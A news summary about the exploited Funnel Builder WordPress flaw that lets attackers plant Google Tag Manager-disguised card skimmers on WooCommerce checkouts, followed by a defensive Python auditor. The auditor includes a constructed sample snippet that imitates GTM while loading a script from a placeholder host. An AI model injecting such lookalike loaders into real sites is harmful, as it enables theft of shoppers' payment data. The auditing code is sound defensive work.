Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

A critical vulnerability in the Funnel Builder WordPress plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages and steal payment data. Sansec says attackers are disguising the skimmer as Google Tag Manager code, while other recent attacks have used backdoored Joomla sites to load instructions from attacker-controlled servers.

Key points

  • The Funnel Builder plugin flaw affects versions before 3.15.0.3.
  • Attackers can inject arbitrary JavaScript into WooCommerce checkout pages without authentication.
  • The injected code is disguised as Google Tag Manager to hide a payment skimmer.
  • The skimmer steals credit card numbers, CVVs, and billing addresses from shoppers.
  • Site owners should update Funnel Builder and review External Scripts for suspicious entries.
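
One way to carry out the check in the last key point, as an added example that is not code from Sansec or the plugin's vendor: it flags a plugin version older than 3.15.0.3 and any script snippet that presents itself as Google Tag Manager but loads from a host other than googletagmanager.com. It assumes the snippet text has been copied out of the External Scripts setting by hand; the sample snippets, the container ID and the `example.invalid` host are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIXED_VERSION = (3, 15, 0, 3)  # per the page: versions before 3.15.0.3 are affected
GTM_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
GTM_HINT = re.compile(r"gtm|tag\s*manager|dataLayer", re.I)

# Constructed sample snippets (placeholder container ID and host).
GENUINE = '<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>'
LOOKALIKE = ("<script>/* Google Tag Manager */(function(d,i){var j=d.createElement('script');"
             "j.src='https://tags.example.invalid/gtm.js?id='+i;d.head.appendChild(j);})"
             "(document,'GTM-XXXXXXX');</script>")

def is_vulnerable(version):
    """True when the installed plugin version is older than the fixed release."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version))
    return parts + (0,) * (4 - len(parts)) < FIXED_VERSION

class _Scripts(HTMLParser):
    """Collects (src, inline body) for every <script> element in a snippet."""
    def __init__(self):
        super().__init__()
        self.found, self._open, self._src, self._buf = [], False, None, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open, self._src, self._buf = True, dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._open:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._open:
            self.found.append((self._src, "".join(self._buf)))
            self._open = False

def audit_snippet(html):
    """Return (host, reason) for each script host that is not a genuine GTM host."""
    parser = _Scripts()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.found:
        urls = ([src] if src else []) + URL_RE.findall(body)
        hosts = {urlparse(u if "://" in u else "https:" + u).hostname for u in urls}
        looks_gtm = bool(GTM_HINT.search((src or "") + body))
        reason = "gtm-lookalike" if looks_gtm else "unlisted-host"
        findings += [(h, reason) for h in sorted(x for x in hosts if x and x not in GTM_HOSTS)]
    return findings
```

An empty result from `audit_snippet` only means every script host in the snippet is a genuine GTM host; any other host is reported so it can be checked against the site's known third-party scripts.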

Read More: https://thehackernews.com/2026/05/funnel-builder-flaw-under-active.html